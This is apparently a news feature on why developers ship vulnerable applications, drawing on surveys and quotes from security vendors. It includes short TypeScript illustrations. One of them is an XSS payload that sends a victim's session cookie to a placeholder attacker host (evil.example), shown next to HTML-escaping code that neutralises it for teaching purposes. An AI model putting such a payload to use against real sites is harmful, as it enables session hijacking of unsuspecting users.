Feature According to a recently published Osterman Research white paper, 81 per cent of developers admit to knowingly releasing vulnerable apps.
If it were a single piece of research, we might have passed it by, but the 2021 Verizon Mobile Security Index reinforced the point by concluding that some 76 per cent of devs experienced pressure to sacrifice mobile security for expediency. Then there’s the cloud applications angle, with Dynatrace research finding that 71 per cent of CISOs aren’t fully confident that code is free of vulnerabilities before it goes live in production.
The icing on this foul-tasting statistical cake can be found in yet another report suggesting that most mobile apps from Fortune 500 organisations can be compromised in 15 minutes flat.
Cycle of application insecurity
The Osterman Research white paper identifies five key takeaways in exploring the human element as it contributes to cyber risk as far as the software development life-cycle (SDLC) is concerned. Perhaps the most contentious, yet at the same time unsurprising, is that an overwhelming majority of developers push live applications out despite knowing them to be insecure.
“I disagree that developers ‘knowingly’ release vulnerable applications,” Setu Kulkarni, VP of Strategy at WhiteHat Security, told The Register, “however, I agree that development teams release vulnerable applications.”
He argued that if development teams knew better, they would take appropriate security measures. “The reason development teams don’t know better is well articulated in the rest of the key takeaways,” Kulkarni said. “Security teams not having faith in the SDLC, struggling to shift left when applications are vulnerable in production, misaligned investment in empowering developers on security and lack of effective training.”
Erez Yalon, head of security research at Checkmarx, agreed that developers who are aware of an existing vulnerability often lack the education or experience needed to truly understand its severity.
“We often hear devs mistakenly downplaying significant vulnerabilities, asking questions like ‘What are the odds someone will find and exploit this?’,” Yalon said.
In other cases, Yalon said, developers simply don’t know how to resolve an issue and “decide that figuring it out isn’t worth the time and effort”. Tactically, there can be little doubt that organisations need to understand better the impact of application vulnerabilities in more technical detail.
“Take for example cross-site scripting (XSS),” said Sean Wright, Principal Application Security Engineer at Immersive Labs, which sponsored the Osterman report. “The de facto example of this is the alert box (<script>alert()</script>).”
Any developer under pressure to release new functionality may, Wright suggested, be under the false assumption that the worst that can happen for their customers is an annoying popup box. “In reality, this could lead to things such as an attacker being able to steal a victim’s session, being able to redirect victims to phishing pages, or even a user’s browser being controlled using tools such as Browser Exploitation Framework (BeEF).”
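Wright’s point can be sketched in a few lines. In this hypothetical rendering helper (the function names and the attacker host are illustrative, not from any real codebase), the same injection point that pops a harmless-looking alert can just as easily exfiltrate a session cookie, while output encoding defuses both payloads:

```typescript
// Naive rendering: user input is interpolated straight into markup,
// so any <script> in the input becomes live, executable code.
function renderUnsafe(comment: string): string {
  return `<p>${comment}</p>`;
}

// Escaping the HTML metacharacters turns the payload into inert text.
function escapeHtml(s: string): string {
  const map: Record<string, string> = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(comment: string): string {
  return `<p>${escapeHtml(comment)}</p>`;
}

// The "harmless" proof-of-concept payload...
const poc = "<script>alert(1)</script>";
// ...and a payload exploiting the identical flaw to steal a session
// cookie (evil.example is a placeholder attacker-controlled host).
const theft =
  '<script>new Image().src="https://evil.example/?c="+document.cookie</script>';

console.log(renderUnsafe(poc)); // script tag survives and would execute
console.log(renderSafe(theft)); // escaped into harmless text
```

The lesson is that the severity of the flaw is set by what an attacker can do with the injection point, not by what the demo payload happens to display.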
One of the dangers of taking that 81 per cent “knowingly” statistic at face value is that not all vulnerabilities are high risk or, indeed, exploitable in the production environment. This means, according to Ilia Kolochenko, founder of ImmuniWeb and a member of the Europol Data Protection Experts Network, that “releasing applications with vulnerabilities is not necessarily a highly dangerous practice”.
He explained that many automated security tools erroneously present unexploitable findings, such as missing secure flags on cookies that contain no sensitive data, or minor misconfigurations of HTTP headers, as high-risk vulnerabilities, which developers then readily ignore. “In many organisations, pressure from business is extreme, and developers are forced to go into production too early and fix vulnerable code in flight mode due to tough time constraints.”
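The sort of low-risk finding described above can be illustrated with a minimal sketch (the helper function and cookie values are hypothetical): a scanner will flag any Set-Cookie header lacking the Secure and HttpOnly attributes, but the real risk depends on what the cookie actually holds.

```typescript
interface CookieOpts { secure?: boolean; httpOnly?: boolean; sameSite?: string }

// Builds a Set-Cookie header value with the optional security attributes.
function setCookieHeader(name: string, value: string, opts: CookieOpts = {}): string {
  let header = `${name}=${value}`;
  if (opts.secure) header += "; Secure";     // only transmitted over HTTPS
  if (opts.httpOnly) header += "; HttpOnly"; // hidden from page JavaScript
  if (opts.sameSite) header += `; SameSite=${opts.sameSite}`;
  return header;
}

// A session token genuinely warrants the flags: omitting them here is a
// real, exploitable weakness.
const session = setCookieHeader("session", "abc123",
  { secure: true, httpOnly: true, sameSite: "Lax" });

// A cosmetic preference cookie without them is the kind of finding a
// tool may still rank as high risk, and which developers learn to ignore.
const theme = setCookieHeader("theme", "dark");

console.log(session); // session=abc123; Secure; HttpOnly; SameSite=Lax
console.log(theme);   // theme=dark
```

Triage that distinguishes the first case from the second is exactly what the automated tooling, as Kolochenko notes, often fails to do.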
The challenge, therefore, has to be finding the balance between what Simon Roe, Product Manager at Outpost24, calls release cadence and fixing things.
“A regular concern I hear from organisations when discussing a shift-left concept is the impact it will have on sprints and release cadence,” Roe told The Register. “If an organisation needs an application to be released to make a specific deadline regarding market opportunity or new features, developers are often caught between hitting that deadline no matter what and potentially delaying the fix of critical or high-risk vulnerabilities.”
Pressure on devs to release
Indeed, dev teams are often measured by feature output, and security isn’t usually seen as a feature. “Unless security is viewed as a feature, it will be viewed as a tax,” according to Tim Mackey, Principal Security Strategist at the Synopsys CyRC (Cybersecurity Research Centre).
The cycle of application insecurity is exacerbated by the shift over the last decade towards component-driven development.
Peter Klimek, Director of Technology at Imperva, pointed out: “85–97 per cent of enterprise codebases [on GitHub] come from open-source libraries and contain 203 dependencies on average.” Those are staggering numbers, revealing how most of the application stack often isn’t really owned by the business itself.
“The challenging aspect is that a simple library containing a vulnerability may be included multiple layers deep and be brought in by another library or dependency,” Klimek continued, “and with many open-source packages barely maintained, security vulnerabilities may take weeks, months or even years (if ever) before a fix is created.”
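Klimek’s point about depth can be sketched with a toy dependency tree (the package names here are made up for illustration): the vulnerable library enters the codebase several layers down, pulled in by something the team never chose directly.

```typescript
interface Dep { name: string; deps: Dep[] }

// Depth-first search returning every path from the app to the target
// package, showing exactly how a transitive dependency was pulled in.
function pathsTo(root: Dep, target: string, trail: string[] = []): string[][] {
  const here = [...trail, root.name];
  const found: string[][] = root.name === target ? [here] : [];
  for (const child of root.deps) found.push(...pathsTo(child, target, here));
  return found;
}

const app: Dep = {
  name: "my-app",
  deps: [
    { name: "web-framework", deps: [
      { name: "templating", deps: [
        { name: "vulnerable-parser", deps: [] }, // three layers deep
      ]},
    ]},
  ],
};

console.log(pathsTo(app, "vulnerable-parser"));
// [["my-app", "web-framework", "templating", "vulnerable-parser"]]
```

Real package managers expose the same information (npm’s `ls` command, for instance), but with 200-odd dependencies per codebase, nobody is reviewing those paths by hand.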
Breaking the development security deadlock
When considering what needs to change to break the development security deadlock, it’s vital to think about where those changes should come from: bottom-up or top-down? The Osterman Research white paper reported that 20 per cent of senior management “often” sign off on unsafe apps. At the same time, 80 per cent appeared to be shifting the blame to developers for not doing their job correctly. The majority of devs, on the other hand, seem to be blaming a lack of resources. Is there a workable way to bridge the disconnect and answer the “who is ultimately responsible” question?
“From a legal viewpoint, the general trend is that the company, and sometimes top management, will be accountable for any poor security practices,” Kolochenko said. He argued that, internally, developers and security teams frequently face tensions due to polarised priorities and an overall lack of resources, with most organisations allocating flagrantly insufficient budgets for both development and security.
“When an enterprise increases the number of devices, applications and cloud storage by 40 per cent every year, a ten per cent increase of the cybersecurity budget is obviously inadequate and will inevitably cause a serious security breach sooner or later,” he concluded.
Rather than shifting left in the development process, is what’s happening, then, more akin to sliding way to the right and leaving it up to enterprise incident response teams to deal with the fallout?
“I don’t believe that companies slide right on purpose,” Erez Yalon told The Register. “Incident response and late fixes are always more costly than fixing issues early in the process, not to mention the actual damage that can happen in a security breach. The phenomenon is more attributable to a lack of expertise and security knowledge than anything else.”
Mark Loveless, a security researcher and engineer at GitLab, sees developer roles continuing to shift left, taking on more responsibility for tasks traditionally handled by operations and security teams. “In 2021, more than 70 per cent of security professionals reported their teams have moved security considerations earlier into the development process. That’s up from 65 per cent last year,” Loveless said, citing GitLab’s research.
So is the answer to the deadlock-breaking question “simply” a matter of growing security culture within the business? “Having teams understanding and working with one another without the divisive us and them situation is vital,” Immersive’s Wright insisted. “Both teams need to realise they work for the same organisation and ultimately have the same goal.” And, ultimately, this needs to come from the top down. “Management must be vested in security and embrace it, not just give it lip service.”
This is where the proverbial wheat is separated from the chaff, according to WhiteHat Security’s Kulkarni. “The ultimate accountability should rest with what I am calling CISO 2.0 — one who takes an approach of building a collaborative security culture instead of playing the blame game, building a security team that has the subject matter expertise as well as a facilitative mindset, creating a scalable security program that incorporates rapid-response as well as systematic improvements to the state of security in the organisation.”
By way of example, Kulkarni suggests that “CISO 2.0” takes a data-driven and risk-based approach to rolling out security initiatives, such as designing a tightly focused ten-minute training module to address historical vulnerability data rather than “boiling the ocean to take the entire software team through a four-hour security training”.
Get off the rostrum and ignore the nostrum
There is no panacea and no straightforward correct answer. There can be no nostrum to cure all ills, and preaching from the board rostrum isn’t the ultimate solution.
“Avoid creating a dichotomy where it must be either the developer’s or management’s fault,” advised Owen Wright, Global Penetration Testing Lead at Context, part of Accenture Security. “Long-term, the inherent security of application development frameworks needs to continue to evolve to the point where it is increasingly difficult to introduce a security flaw.”
In the meantime, Wright proffered five bullet points that can help:
- Educate developers and make it harder for them to make mistakes.
- Give developers the agency to write secure code.
- Make security matter in your project life-cycle.
- Clearly set responsibilities within an organisation and tie those responsibilities into performance metrics.
- Incentivise good behaviour. ®